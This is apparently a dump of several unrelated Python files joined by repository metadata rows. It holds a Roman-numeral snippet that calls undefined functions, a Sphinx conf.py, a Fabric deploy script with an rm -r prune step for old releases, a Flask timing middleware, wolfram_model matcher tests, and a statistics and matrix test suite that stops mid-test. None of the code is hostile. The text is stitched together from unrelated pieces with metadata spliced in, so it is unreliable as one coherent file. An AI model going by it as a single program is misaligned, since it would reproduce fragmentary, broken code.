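#   to_arabic("XIV") == 14 (the I before V subtracts)
#   to_roman(2024) == "MMXXIV"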
romans = ["CCCLXIX", "LXXX", "XXIX", "CLV", "XIV", "CDXCII", "CCCXLVIII", "CCCI", "CDLXIX", "CDXCIX"]
nums = [369, 80, 29, 155, 14, 492, 348, 301, 469, 499]
n = to_arabic(input())
m = to_arabic(input())
print(to_roman(n + m))
| 27.8
| 123
| 0.492806
|
55c11fd87124425f18cbdbc6bb1474e08897d5ca
| 4,221
|
py
|
Python
|
doc/conf.py
|
dsd-test-nupack-in-github-workflow/dsd
|
55b006323550eb32398b050ca1a3e71a26719709
|
[
"MIT"
] | 2
|
2021-08-17T12:08:37.000Z
|
2021-11-02T05:57:55.000Z
|
doc/conf.py
|
dsd-test-nupack-in-github-workflow/dsd
|
55b006323550eb32398b050ca1a3e71a26719709
|
[
"MIT"
] | 56
|
2020-11-19T19:39:16.000Z
|
2022-03-29T10:26:04.000Z
|
doc/conf.py
|
dsd-test-nupack-in-github-workflow/dsd
|
55b006323550eb32398b050ca1a3e71a26719709
|
[
"MIT"
] | 2
|
2021-02-13T02:43:47.000Z
|
2022-03-29T02:53:53.000Z
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import sphinx.util.inspect as inspect
import sphinx.ext.autodoc as auto
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('../dsd'))
# Type "make html" at the command line to generate the documentation.
# -- Project information -----------------------------------------------------
project = 'dsd: DNA sequence designer'
copyright = '2020, David Doty and Damien Woods'
author = 'David Doty and Damien Woods'
# The full version, including alpha/beta/rc tags
release = '0.1.0'
# version = __version__
# release = __version__
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
# 'sphinx.ext.napoleon',
]
autodoc_typehints = "description"
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "sphinx_rtd_theme"
# html_theme = 'alabaster'
# html_theme = "classic"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = []
# use order in source rather than alphabetical order
autodoc_member_order = 'bysource'
# intersphinx_mapping = {'python': ('https://docs.python.org/3', None)}
# removes constant values from documentation that are longer than length_limit characters.
# taken from
# https://stackoverflow.com/questions/25145817/ellipsis-truncation-on-module-attribute-value-in-sphinx-generated-documentatio/25163963#25163963
# from sphinx.ext.autodoc import DataDocumenter, ModuleLevelDocumenter, SUPPRESS
# from sphinx.util.inspect import safe_repr
length_limit = 50
# below is for documenting __init__ with automodule
# https://stackoverflow.com/questions/5599254/how-to-use-sphinxs-autodoc-to-document-a-classs-init-self-method
def skip(app, what, name, obj, would_skip, options):
if name == "__init__":
return False
return would_skip
def setup(app):
app.connect("autodoc-skip-member", skip)
#
# autoclass_content = 'both'
def add_directive_header(self, sig):
auto.ModuleLevelDocumenter.add_directive_header(self, sig)
if not self.options.annotation:
try:
# objrepr = inspect.safe_repr(self.object)
objrepr = inspect.object_description(self.object)
# PATCH: truncate the value if longer than length_limit characters
if len(objrepr) > length_limit:
objrepr = objrepr[:length_limit] + "..."
except ValueError:
pass
else:
self.add_line(u' :annotation: = ' + objrepr, '<autodoc>')
elif self.options.annotation is auto.SUPPRESS:
pass
else:
self.add_line(u' :annotation: %s' % self.options.annotation,
'<autodoc>')
auto.DataDocumenter.add_directive_header = add_directive_header
# https://stackoverflow.com/questions/56336234/build-fail-sphinx-error-contents-rst-not-found
master_doc = 'index'
| 34.040323
| 143
| 0.688226
|
1f4664ac566cd1be4f688828426cb85c05590c35
| 2,013
|
py
|
Python
|
fabfile.py
|
c17r/aturan-calendar-bot
|
4854aa4af17da16aec8ac4cc11de09bffe2e7238
|
[
"MIT"
] | 1
|
2022-01-11T06:03:56.000Z
|
2022-01-11T06:03:56.000Z
|
fabfile.py
|
c17r/aturan-calendar-bot
|
4854aa4af17da16aec8ac4cc11de09bffe2e7238
|
[
"MIT"
] | 1
|
2021-02-10T02:53:27.000Z
|
2021-02-23T21:42:34.000Z
|
fabfile.py
|
c17r/aturan-calendar-bot
|
4854aa4af17da16aec8ac4cc11de09bffe2e7238
|
[
"MIT"
] | 1
|
2022-01-11T06:03:59.000Z
|
2022-01-11T06:03:59.000Z
|
from datetime import datetime
from fabric.api import task, env, settings, cd, sudo, run, local, put, path, shell_env
server_user = 'aturan_calendar'
stamp = datetime.now().strftime("v%Y%m%d%H%M%S")
stamptar = server_user + "-" + stamp + ".tar"
stampzip = stamptar + ".gz"
env.stamp = stamp
env.stamptar = stamptar
env.stampzip = stampzip
env.server_user = server_user
@task
def live():
env.hosts = [
"crow.endrun.org"
]
@task
def deploy():
local('make clean')
local('pipenv run python setup.py sdist bdist_wheel --universal')
local('tar cf %(stamptar)s run.sh' % env)
local('(cd dist && tar rf ../%(stamptar)s *.tar.gz)' % env)
local('gzip %(stamptar)s' % env)
put(stampzip, '/tmp/%(stampzip)s' % env)
local('rm %(stampzip)s' % env)
with settings(sudo_user=server_user):
with cd('/home/%(server_user)s/run' % env):
sudo('mkdir -p %(stamp)s/src' % env)
sudo('mkdir -p %(stamp)s/venv' % env)
with cd('/home/%(server_user)s/run/%(stamp)s' % env):
sudo('tar xfz /tmp/%(stampzip)s -C ./src/' % env)
sudo('rm /tmp/%(stampzip)s' % env)
with settings(sudo_user=server_user):
with cd('/home/%(server_user)s/run/%(stamp)s' % env):
with shell_env(PATH='/opt/pyenv/bin/:$PATH', PYENV_ROOT='/opt/pyenv'):
sudo('virtualenv venv -p $(pyenv prefix 3.6.2)/bin/python' % env)
with path('./venv/bin', behavior='prepend'):
sudo('pip install --quiet --no-cache-dir ./src/*.tar.gz' % env)
with cd('/home/%(server_user)s/run' % env):
sudo('ln -nsf $(basename $(readlink -f current)) previous' % env)
sudo('ln -nsf %(stamp)s current' % env)
@task
def prune():
with settings(sudo_user=server_user):
with cd('/home/%(server_user)s/run' % env):
sudo('[ -h current ] && $(for dir in $(ls -1f | grep -e "/$" | grep -ve "$(readlink previous)\|$(readlink current)"); do rm -r $dir; done) || true')
| 31.453125
| 160
| 0.584203
|
46ab2aa162ed6168ec4d79db5d73daacb4290d42
| 427
|
py
|
Python
|
app/Middleware/logger_middleware.py
|
psyphore/flask-phone-book
|
cceec3caabdeb03f260d37f3b55d5aa7a52c30c2
|
[
"MIT"
] | null | null | null |
app/Middleware/logger_middleware.py
|
psyphore/flask-phone-book
|
cceec3caabdeb03f260d37f3b55d5aa7a52c30c2
|
[
"MIT"
] | 2
|
2021-03-19T03:39:56.000Z
|
2021-06-08T20:28:03.000Z
|
app/Middleware/logger_middleware.py
|
psyphore/flask-phone-book
|
cceec3caabdeb03f260d37f3b55d5aa7a52c30c2
|
[
"MIT"
] | null | null | null |
from time import time as timer
from datetime import datetime
class LoggerMiddleware(object):
    def __init__(self, app):
        self.app = app
    def __call__(self, environ, start_response):
        # time the wrapped application call instead of measuring from startup
        start = timer()
        response = self.app(environ, start_response)
        elapsed = round((timer() - start) * 1000, 2)
        print(f'> incoming: {environ.get("PATH_INFO", "/")} at {datetime.utcnow()} in {elapsed} ms')
        return response
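# Hypothetical wiring sketch (not part of the original module): wrap a Flask
# app's WSGI callable so every request passes through the middleware.
#
#   from flask import Flask
#   app = Flask(__name__)
#   app.wsgi_app = LoggerMiddleware(app.wsgi_app)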
| 30.5
| 77
| 0.690867
|
333a090f035762301ef17458734ba1df0971fbb3
| 897
|
py
|
Python
|
python/tests/set_replace/test_match.py
|
phcerdan/wolfram_model
|
a4dd26295df7cb995ce666007860ca86efa38e8a
|
[
"MIT"
] | 12
|
2020-04-19T00:30:57.000Z
|
2021-12-20T02:24:35.000Z
|
python/tests/set_replace/test_match.py
|
SicachaMauricio/wolfram_model
|
a4dd26295df7cb995ce666007860ca86efa38e8a
|
[
"MIT"
] | 5
|
2020-04-18T06:08:39.000Z
|
2020-05-24T14:47:29.000Z
|
python/tests/set_replace/test_match.py
|
SicachaMauricio/wolfram_model
|
a4dd26295df7cb995ce666007860ca86efa38e8a
|
[
"MIT"
] | 4
|
2020-04-19T21:31:20.000Z
|
2022-02-11T19:47:00.000Z
|
import pytest
import numpy as np
import wolfram_model as wm
def test_match_enums():
order_function = wm.matcher.ordering_function.RuleIndex
print(order_function)
order_direction = wm.matcher.ordering_direction.Normal
print(order_direction)
ordering_spec = [[order_function, order_direction]]
def a_dummy_get_atoms_vector_func(long_):
return [long_, long_]
def test_matcher_constructor():
rule = wm.rule(inputs=[[-1,-2], [-2, -3]], outputs=[[-1,-3], [-4, -2], [-1, -4]])
atoms_index = wm.atoms_index(a_dummy_get_atoms_vector_func)
ordering_spec = [[wm.matcher.ordering_function.RuleIndex,
wm.matcher.ordering_direction.Normal]]
matcher = wm.matcher(
rules=[rule],
atoms_index=atoms_index,
get_atoms_vector=a_dummy_get_atoms_vector_func,
ordering=ordering_spec
)
print(matcher.all_matches())
| 30.931034
| 85
| 0.702341
|
299f0b24d01a62be63912fb06735373c88146133
| 22,378
|
py
|
Python
|
tests.py
|
ashishjayamohan/Tread
|
f812c48d27c6d9ca33e3579d7a74ee43d93df310
|
[
"MIT"
] | 3
|
2020-09-15T19:42:04.000Z
|
2021-05-10T23:00:53.000Z
|
tests.py
|
ashishjayamohan/Tread
|
f812c48d27c6d9ca33e3579d7a74ee43d93df310
|
[
"MIT"
] | 2
|
2020-09-17T02:49:05.000Z
|
2020-09-19T22:20:31.000Z
|
tests.py
|
ashishjayamohan/Tread
|
f812c48d27c6d9ca33e3579d7a74ee43d93df310
|
[
"MIT"
] | 1
|
2020-09-15T19:00:04.000Z
|
2020-09-15T19:00:04.000Z
|
from pocha import describe, it
import scripts.vectorization_functions as vf
def assert_raises(*exceptions):
def decorator(fn):
def func_wrapper(*args, **kwargs):
threw = False
try:
fn(*args, **kwargs)
except exceptions:
threw = True
assert threw
return func_wrapper
return decorator
class Almost:
def __init__(self, n, tol=1e-12):
self._num = n
self.tol = tol
def __eq__(self, other):
diff = self._num - other
if diff < 0: diff = -diff
return diff < self.tol
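# Illustrative only (not part of the original suite): how the two helpers
# above are meant to be used.
def _demo_helpers():
    @assert_raises(ZeroDivisionError)
    def divides_by_zero():
        1 / 0
    divides_by_zero()                          # passes: the exception was raised
    assert Almost(0.1 + 0.2, tol=1e-9) == 0.3  # floating-point-tolerant equality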
@describe('Basic Functions')
def test_basic_functions():
import scripts.basic_functions as bf
@describe('Add')
def test_add():
@it('Empty Array')
def _():
assert bf.add([]) == 0
@it('Ints')
def _():
assert bf.add([5, 3, 1, 4, 2], mode='int') == 15
@it('Floats')
def _():
assert bf.add([5.0, 2.5, 1.5, 4.0, 2.0], mode='float') == 15.0
@it('Strings')
def _():
assert bf.add(['4.5', '3.5', '1', '4.0', '2'], mode='str') == 15.0
@it('Mixed')
def _():
assert bf.add(['5', 3.0, 1, '4.0', 2.0], mode='mixed') == 15.0
@describe('Average')
def test_average():
@it('Empty Array')
def _():
assert bf.average([]) == 0.0
@it('One Element (int)')
def _():
assert bf.average([1]) == 1.0
@it('One Element (float)')
def _():
assert bf.average([1.0]) == 1.0
@it('Two Elements')
def _():
assert bf.average([1, 3]) == 2.0
@it('Many Elements')
def _():
assert bf.average([1, 2, 3, 4, 5, 6]) == 3.5
@describe('Types')
def test_types():
@it('Empty Array')
def _():
assert bf.types([]) == []
@it('One Element')
def _():
assert bf.types([3]) == [type(3)]
@it('Two Elements')
def _():
assert bf.types([3, '3']) == [type(3), type('3')]
@it('Many Elements')
def _():
assert bf.types([3, '3', 3.0, [1, 2, 3], {'a': 1}]) == [type(3), type('3'), type(3.0), type([1, 2, 3]), type({'a': 1})]
@describe('Highest Frequency')
def test_highest_frequency():
@it('Empty Array')
def _():
assert bf.highest_frequency([]) is None
@it('One Element')
def _():
assert bf.highest_frequency([1]) == ((1,), 1)
@it('Two Elements (Same)')
def _():
assert bf.highest_frequency([1, 1]) == ((1,), 2)
@it('Two Elements (Different)')
def _():
assert bf.highest_frequency([1, 2]) == ((1, 2), 1)
@it('Many Elements')
def _():
assert bf.highest_frequency([1, 5, 2, 3, 1, 4, 1, 5, 5]) == ((1, 5), 3)
@describe('Frequency')
def test_frequency():
@it('Empty Array')
def _():
assert bf.frequency([]) == {}
@it('One Element')
def _():
assert bf.frequency([1]) == {1: 1}
@it('Two Elements (Same)')
def _():
assert bf.frequency([1, 1]) == {1: 2}
@it('Two Elements (Different)')
def _():
assert bf.frequency([1, 2]) == {1: 1, 2: 1}
@it('Same Value, Different Types (cast=False)')
def _():
assert bf.frequency([1, 1.0, '1', '1.0'], cast=False) == {1: 1, 1.0: 1, '1': 1, '1.0': 1}
@it('Same Value, Different Types (cast=True)')
def _():
assert bf.frequency([1, 1.0, '1', '1.0'], cast=True) == {1.0: 4}
@describe('Determine Mode')
def test_determine_mode():
@it('Empty Array')
def _():
assert bf.determine_mode([]) is None
@it('One Element (int)')
def _():
assert bf.determine_mode([1]) == 'int'
@it('One Element (float)')
def _():
assert bf.determine_mode([1.0]) == 'float'
@it('One Element (str)')
def _():
assert bf.determine_mode(['1']) == 'str'
@it('Many Elements (int)')
def _():
assert bf.determine_mode([1, 2, 3]) == 'int'
@it('Many Elements (float)')
def _():
assert bf.determine_mode([1.0, 2.0, 3.0]) == 'float'
@it('Many Elements (str)')
def _():
assert bf.determine_mode(['1', '2', '3']) == 'str'
@it('Many Elements (mixed)')
def _():
assert bf.determine_mode([1, 2.0, '3']) == 'mixed'
@describe('Median')
def test_median():
@it('Empty Array')
def _():
assert bf.median([]) is None
@it('One Element (int)')
def _():
assert bf.median([1]) == 1
@it('One Element (float)')
def _():
assert bf.median([1.0]) == 1.0
@it('Two Elements')
def _():
assert bf.median([1, 2]) == 1.5
@it('Many Elements')
def _():
assert bf.median([1, 2, 3, 4, 5, 6]) == 3.5
@describe('Quartiles')
def test_quartiles():
@it('Empty Array')
def _():
assert bf.quartiles([]) is None
@it('One Element')
def _():
assert bf.quartiles([1]) == (1, 1, 1, 1, 1)
@it('Two Elements')
def _():
assert bf.quartiles([2, 1]) == (1, None, 1.5, None, 2)
@it('Three Elements')
def _():
assert bf.quartiles([1, 3, 2]) == (1, 1, 2, 3, 3)
@it('Six Elements')
def _():
assert bf.quartiles([4, 5, 6, 1, 2, 3]) == (1, 2, 3.5, 5, 6)
@it('Seven Elements')
def _():
assert bf.quartiles([4, 2, 5, 3, 6, 1, 7]) == (1, 2, 4, 6, 7)
@describe('Mode')
def test_mode():
@it('Empty Array')
def _():
            assert bf.mode([]) is None
@it('One Element')
def _():
assert bf.mode([1]) == 1
@it('Two Elements (Same)')
def _():
assert bf.mode([1, 1]) == 1
@it('Two Elements (Different)')
def _():
            assert bf.mode([1, 2]) is None
@it('Six Elements (Uniform)')
def _():
            assert bf.mode([1, 2, 3, 4, 5, 6]) is None
@it('Six Elements (Non-Uniform)')
def _():
assert bf.mode([1, 2, 3, 4, 5, 1]) == 1
@describe('Length')
def test_length():
@it('Empty Array')
def _():
assert bf.length([]) == 0
@it('One Element')
def _():
assert bf.length([1]) == 1
@it('Two Elements')
def _():
assert bf.length([1, 2]) == 2
@it('Five Elements')
def _():
assert bf.length([1, 2, 3, 4, 5]) == 5
@describe('Pare Unique')
def test_pare_unique():
@it('Empty Array')
def _():
assert bf.pare_unique([]) == []
@it('One Element')
def _():
assert bf.pare_unique([1]) == [1]
@it('Two Elements (Same)')
def _():
assert bf.pare_unique([1, 1]) == [1]
@it('Two Elements (Different)')
def _():
assert bf.pare_unique([1, 2]) == [1, 2]
@it('Six Elements (Same)')
def _():
assert bf.pare_unique([1, 1, 1, 1, 1, 1]) == [1]
@it('Six Elements (Unique)')
def _():
assert bf.pare_unique([1, 2, 3, 4, 5, 6]) == [1, 2, 3, 4, 5, 6]
@describe('Math Functions')
def test_math_functions():
import scripts.math_functions as mf
@describe('Add')
def test_add_num():
@it('1 + 1 = 2')
def _():
assert mf.add_num(1, 1) == 2
@it('2 + 2 = 4')
def _():
assert mf.add_num(2, 2) == 4
@it('2.5 + 3.5 = 6')
def _():
assert mf.add_num(2.5, 3.5) == 6
@it('34,567 + 24,211 = 58,778')
def _():
assert mf.add_num(34567, 24211) == 58778
@describe('Subtract')
def test_subtract_num():
@it('1 - 1 = 0')
def _():
assert mf.subtract_num(1, 1) == 0
@it('2 - 3 = -1')
def _():
assert mf.subtract_num(2, 3) == -1
@it('2.5 - 3.5 = -1')
def _():
assert mf.subtract_num(2.5, 3.5) == -1
@it('37,831 - 84,521 = -46,690')
def _():
assert mf.subtract_num(37831, 84521) == -46690
@describe('Absolute Difference')
def test_abs_diff():
@it('|3 - 1| = 2')
def _():
assert mf.abs_diff(3, 1) == 2
@it('|5 - 10| = 5')
def _():
assert mf.abs_diff(5, 10) == 5
@it('|28,542 - 61,317| = 32,775')
def _():
assert mf.abs_diff(28542, 61317) == 32775
@describe('Divide')
def test_divide_num():
@it('k / 0 raises TypeError')
@assert_raises(TypeError)
def _():
mf.divide_num(3, 0)
@it('6 / 3 = 2')
def _():
assert mf.divide_num(6, 3) == 2
@it('7 / 2 = 3.5')
def _():
assert mf.divide_num(7, 2) == 3.5
@it('93.6 / 15.6 = 6')
def _():
assert mf.divide_num(93.6, 15.6) == 6
@it('200,662 / 28,666 = 7')
def _():
assert mf.divide_num(200662, 28666) == 7
@describe('Multiply')
def test_multiply_num():
@it('12 * 5 = 60')
def _():
assert mf.multiply_num(12, 5) == 60
@it('7 * 7 = 49')
def _():
assert mf.multiply_num(7, 7) == 49
@it('6.1 * 36.55 == 222.955')
def _():
from math import isclose
assert isclose(mf.multiply_num(6.1, 36.55), 222.955)
@it('5,048 * 729 = 3,679,992')
def _():
assert mf.multiply_num(5048, 729) == 3679992
@describe('Modulo')
def test_modulo():
@it('k % 0 raises ZeroDivisionError')
@assert_raises(ZeroDivisionError)
def _():
mf.mod(5, 0)
@it('7 % 4 = 3')
def _():
assert mf.mod(7, 4) == 3
@it('37 % 3 = 1')
def _():
assert mf.mod(37, 3) == 1
@it('551 % 13 = 5')
def _():
assert mf.mod(551, 13) == 5
@describe('Factorial')
def test_factorial():
@it('0! = 1')
def _():
assert mf.factorial(0) == 1
@it('1! = 1')
def _():
assert mf.factorial(1) == 1
@it('2! = 2')
def _():
assert mf.factorial(2) == 2
@it('3! = 6')
def _():
assert mf.factorial(3) == 6
@it('10! = 3628800')
def _():
assert mf.factorial(10) == 3628800
@describe('Choose')
def test_choose():
@it('0 choose 0 = 1')
def _():
assert mf.choose(0, 0) == 1
@it('3 choose 2 = 3')
def _():
assert mf.choose(3, 2) == 3
@it('10 choose 4 = 210')
def _():
assert mf.choose(10, 4) == 210
@it('n choose r for r > n raises ValueError')
@assert_raises(ValueError)
def _():
mf.choose(2, 3)
@it('n choose r for n < 0 raises ValueError')
@assert_raises(ValueError)
def _():
mf.choose(-3, 2)
@it('n choose r for r < 0 raises ValueError')
@assert_raises(ValueError)
def _():
mf.choose(3, -2)
@describe('Number of Digits')
def test_length_num():
@it('1 => 1')
def _():
assert mf.length_num(1) == 1
@it('-1 => 1')
def _():
assert mf.length_num(-1) == 1
@it('1.1 => 2')
def _():
assert mf.length_num(1.1) == 2
@it('43 => 2')
def _():
assert mf.length_num(43) == 2
@it('-264.012 => 6')
def _():
assert mf.length_num(-264.012) == 6
@describe('Echo')
def test_echo():
@it('1')
def _():
assert mf.echo(1) == '1'
@it('-3')
def _():
assert mf.echo(-3) == '-3'
@it('2.5')
def _():
assert mf.echo(2.5) == '2.5'
@it('-123456789.012345')
def _():
assert mf.echo(-123456789.012345) == '-123456789.012345'
@describe('Output')
def test_output():
from io import StringIO
import sys
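# Minimal stdout-capture helper: it swaps sys.stdout for a StringIO inside the
# `with` block and stores the captured output lines as elements of the list itself.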
class Capturing(list):
def __enter__(self):
self._stdout = sys.stdout
sys.stdout = self._stringio = StringIO()
return self
def __exit__(self, *args):
self.extend(self._stringio.getvalue().splitlines())
del self._stringio
sys.stdout = self._stdout
with Capturing() as output:
mf.out(1)
mf.out(24.5)
mf.out(-34.77)
mf.out(1234567)
@it('1')
def _():
assert output[0] == '1'
@it('24.5')
def _():
assert output[1] == '24.5'
@it('-34.77')
def _():
assert output[2] == '-34.77'
@it('1234567')
def _():
assert output[3] == '1234567'
@describe('Percent')
def test_percent():
@it('10% of 40 = 4')
def _():
assert mf.percent(10, 40) == 4
@it('4% of 800 = 32')
def _():
assert mf.percent(4, 800) == 32
@it('92% of 3 = 2.76')
def _():
from math import isclose
assert isclose(mf.percent(92, 3), 2.76)
@describe('Digit Array')
def test_digit_arr():
@it('1')
def _():
assert mf.digit_arr(1) == [1]
@it('-32')
def _():
assert mf.digit_arr(-32) == [3, 2]
@it('32.624')
def _():
assert mf.digit_arr(32.624) == [3, 2, 6, 2, 4]
@describe('Matrix Functions')
def test_matrix_functions():
import scripts.matrix_functions as mf
@describe('Determinant')
def test_determinant():
@it('1x1 Matrix')
def _():
assert mf.determinant([[1]]) == 1
assert mf.determinant([[2.5]]) == 2.5
assert mf.determinant([[7]]) == 7
@it('2x2 Matrix')
def _():
assert mf.determinant([[1, 2], [3, 4]]) == -2
assert mf.determinant([[6, 4], [9, 7]]) == 6
assert mf.determinant([[8, 3], [2, 1]]) == 2
@it('3x3 Matrix')
def _():
assert mf.determinant([[1, 2, 3], [4, 5, 6], [7, 8, 9]]) == 0
assert mf.determinant([[6, 8, 1], [11, 2, 0], [7, 10, 7]]) == -436
assert mf.determinant([[1, 1, 1], [8, 7, 6], [0, 9, 99]]) == -81
@it('5x5 Irregular Matrix')
def _():
assert mf.determinant([
[6, 2, 8, 3, 7],
[2, 8, 1, 8, 1],
[7, 4, 11, 6, 2],
[15, 72, 1, 11, 19],
[22, 44, 94, 67, 1],
]) == -1008848
@describe('Make Matrix (Internal)')
def test_make_matrix():
@it('Empty matrix raises ValueError')
@assert_raises(ValueError)
def _():
mf.make_matrix([])
@it('2x2 Matrix')
def _():
assert mf.make_matrix([['1', 2], [3.0, '4.0']]) == [[1.0, 2.0], [3.0, 4.0]]
@it('3x3 Matrix')
def _():
assert mf.make_matrix([['1', 2, 3.0], ['4.0', 5, '6'], [7.0, '8', '9.0']]) == [[1.0, 2.0, 3.0], [4.0, 5.0, 6.0], [7.0, 8.0, 9.0]]
@it('4x4 Matrix')
def _():
assert mf.make_matrix([['1', 2, 3.0, '4.0'], [6, '1', 7.0, '8.6'], ['3', '2', 1, -5], [10, 11, 12.0, '-13.2']]) == [[1.0, 2.0, 3.0, 4.0], [6.0, 1.0, 7.0, 8.6], [3.0, 2.0, 1.0, -5.0], [10.0, 11.0, 12.0, -13.2]]
@it('5x5 Matrix')
def _():
assert mf.make_matrix([['1', 2, 3.0, '4.0', 5], [1, '9', '-8', 3, 1.0], [3, 3, 3, 3, 3], [-9, 7, 5, 3, 1.12], ['3.33', 6.2, -1, 9, 9]]) == [[1.0, 2.0, 3.0, 4.0, 5.0], [1.0, 9.0, -8.0, 3.0, 1.0], [3.0, 3.0, 3.0, 3.0, 3.0], [-9.0, 7.0, 5.0, 3.0, 1.12], [3.33, 6.2, -1.0, 9.0, 9.0]]
@describe('Add')
def test_add():
@it('Empty matrix raises ValueError')
@assert_raises(ValueError)
def _():
mf.add([], [])
@it('2x2 Matrix')
def _():
assert mf.add([[1, 2], [3, 4]],[[5.2, 2], [-3, -1]]) == [[6.2, 4], [0, 3]]
@it('3x3 Matrix')
def _():
assert mf.add([[1, 2, 3], [4, 5, 6], [7, 8, 9]], [[9, 7, 4], [7.1, -2, 0], [11, -7, 2]]) == [[10, 9, 7], [11.1, 3, 6], [18, 1, 11]]
@it('4x4 Matrix')
def _():
assert mf.add([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]], [[1, -2, 3, -4], [-5, 6, -7, 8], [9, -10, 11, -12], [-13, 14, -15, 16]]) == [[2, 0, 6, 0], [0, 12, 0, 16], [18, 0, 22, 0], [0, 28, 0, 32]]
@it('5x5 Matrix')
def _():
assert mf.add([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10.1], [11, 12, 13, 14, 15], [1.6, 17, 13, 19, 20], [21, -22, 23, 24, 25]], [[7, 7, 7, 7, 7], [8, 8, 8, 8, 8], [9, -9, 9, -9, 9], [3, 4, 5, 6, 7], [11, 12, 13, 14, 14.1]]) == [[8, 9, 10, 11, 12], [14, 15, 16, 17, 18.1], [20, 3, 22, 5, 24], [4.6, 21, 18, 25, 27], [32, -10, 36, 38, 39.1]]
@describe('Subtract')
def test_subtract():
@it('Empty matrix raises ValueError')
@assert_raises(ValueError)
def _():
mf.subtract([], [])
@it('2x2 Matrix')
def _():
assert mf.subtract([[1, 2], [3, 4]], [[5.2, 2], [-3, -1]]) == [[-4.2, 0], [6, 5]]
@it('3x3 Matrix')
def _():
assert mf.subtract([[1, 2, 3], [4, 5, 6], [7, 8, 9]], [[9, 7, 4], [7.5, -2, 0], [11, -7, 2]]) == [[-8, -5, -1], [-3.5, 7, 6], [-4, 15, 7]]
@it('4x4 Matrix')
def _():
assert mf.subtract([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]], [[1, -2, 3, -4], [-5, 6, -7, 8], [9, -10, 11, -12], [-13, 14, -15, 16]]) == [[0, 4, 0, 8], [10, 0, 14, 0], [0, 20, 0, 24], [26, 0, 30, 0]]
@it('5x5 Matrix')
def _():
assert mf.subtract([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10.5], [11, 12, 13, 14, 15], [1.6, 17, 13, 19, 20], [21, -22, 23, 24, 25]], [[7, 7, 7, 7, 7], [8, 8, 8, 8, 8], [9, -9, 9, -9, 9], [3, 4, 5, 6, 7], [11, 12, 13, 14, 14.1]]) == [[-6, -5, -4, -3, -2], [-2, -1, 0, 1, 2.5], [2, 21, 4, 23, 6], [-1.4, 13, 8, 13, 13], [10, -34, 10, 10, 10.9]]
@describe('Divide')
def test_divide():
@it('Empty matrix raises ValueError')
@assert_raises(ValueError)
def _():
mf.divide([], [])
@it('2x2 Matrix')
def _():
assert mf.divide([[3, 2], [3, 4]], [[2, 2], [-4, -1]]) == [[1.5, 1], [-0.75, -4]]
@it('3x3 Matrix')
def _():
assert mf.divide([[1, 2, 3], [4, 5, 6], [7, 8, 9]], [[2, 1, 1], [-1, -2, 1], [2, -2, 2]]) == [[0.5, 2.0, 3.0], [-4.0, -2.5, 6.0], [3.5, -4.0, 4.5]]
@it('4x4 Matrix')
def _():
assert mf.divide([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]], [[1, -2, 1, 2], [2, 2, -1, 1], [1, 2, 1, -1], [2, 1, 1, -1]]) == [[1.0, -1.0, 3.0, 2.0], [2.5, 3.0, -7.0, 8.0], [9.0, 5.0, 11.0, -12.0], [6.5, 14.0, 15.0, -16.0]]
@it('5x5 Matrix')
def _():
assert mf.divide([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10.1], [11, 12, 13, 14, 15], [1.6, 17, 13, 19, 20], [21, -22, 23, 24, 25]], [[1, 2, 2, -2, 2], [1, -2, -1, 2, 2], [-2, 1, 1, -2, 1], [-1, 2, 1, -1, -2], [-1, 2, 2, -1, -2]]) == [[1.0, 1.0, 1.5, -2.0, 2.5], [6.0, -3.5, -8.0, 4.5, 5.05], [-5.5, 12.0, 13.0, -7.0, 15.0], [-1.6, 8.5, 13.0, -19.0, -10.0], [-21.0, -11.0, 11.5, -24.0, -12.5]]
@describe('Multiply')
def test_multiply():
@it('Empty matrix raises ValueError')
@assert_raises(ValueError)
def _():
mf.multiply([], [])
@it('2x2 Matrix')
def _():
assert mf.multiply([[1, 2], [3, 4]],[[5.5, 2], [-3, -1]]) == [[-0.5, 0], [4.5, 2]]
@it('3x3 Matrix')
def _():
assert mf.multiply([[1, 2, 3], [4, 5, 6], [7, 8, 9]], [[9, 7, 4], [7.1, -2, 0], [11, -7, 2]]) == [[56.2, -18, 10], [137.5, -24, 28], [218.8, -30, 46]]
@it('4x4 Matrix')
def _():
assert mf.multiply([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]], [[1, -2, 3, -4], [-5, 6, -7, 8], [9, -10, 11, -12], [-13, 14, -15, 16]]) == [[-34, 36, -38, 40], [-66, 68, -70, 72], [-98, 100, -102, 104], [-130, 132, -134, 136]]
@it('5x5 Matrix')
def _():
assert mf.multiply([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10.1], [11, 12, 13, 14, 15], [1.6, 17, 13, 19, 20], [21, -22, 23, 24, 25]], [[7, 7, 7, 7, 7], [8, 8, 8, 8, 8], [9, -9, 9, -9, 9], [3, 4, 5, 6, 7], [11, 12, 13, 14, 14.1]]) == [[117, 72, 135, 90, 148.5], [308.1, 183.2, Almost(346.3), 221.4, Almost(375.41)], [497, 292, 555, 350, 599.5], [541.2, 346.2, 619.2, 424.2, 679.2], [525, 160, 623, 258, 698.5]]
@describe('Element-Wise Multiply')
def test_element_wise_multiply():
